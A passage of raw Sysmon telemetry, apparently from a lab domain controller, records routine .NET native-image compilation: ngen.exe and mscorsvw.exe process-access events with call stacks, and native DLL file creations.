13:24:22.270{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4606-6000-4903-000000009A01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.848{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460C-6000-4B03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.833{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-460C-6000-4B03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.833{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460C-6000-4B03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460C-6000-4A03-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.411{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-460C-6000-4A03-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:28.411{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460C-6000-4A03-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:28.020{08A6967A-4606-6000-4903-000000009A01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12dc-0\System.Windows.Forms.dll2021-01-14 13:24:28.020 10341000x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.817{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460D-6000-4F03-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.801{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460D-6000-4F03-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.801{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460D-6000-4F03-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.723{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460D-6000-4E03-000000009A01}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.708{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460D-6000-4E03-000000009A01}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.708{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460D-6000-4E03-000000009A01}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:29.645{08A6967A-460D-6000-4D03-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1238-0\System.ServiceProcess.dll2021-01-14 13:24:29.645 10341000x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.536{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460D-6000-4D03-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.520{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-460D-6000-4D03-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.520{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460D-6000-4D03-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460D-6000-4C03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.442{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460D-6000-4C03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:29.442{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460D-6000-4C03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:29.333{08A6967A-460C-6000-4B03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bdc-0\System.Runtime.Remoting.dll2021-01-14 13:24:29.333 10341000x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460E-6000-5303-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.755{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-460E-6000-5303-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.755{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460E-6000-5303-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 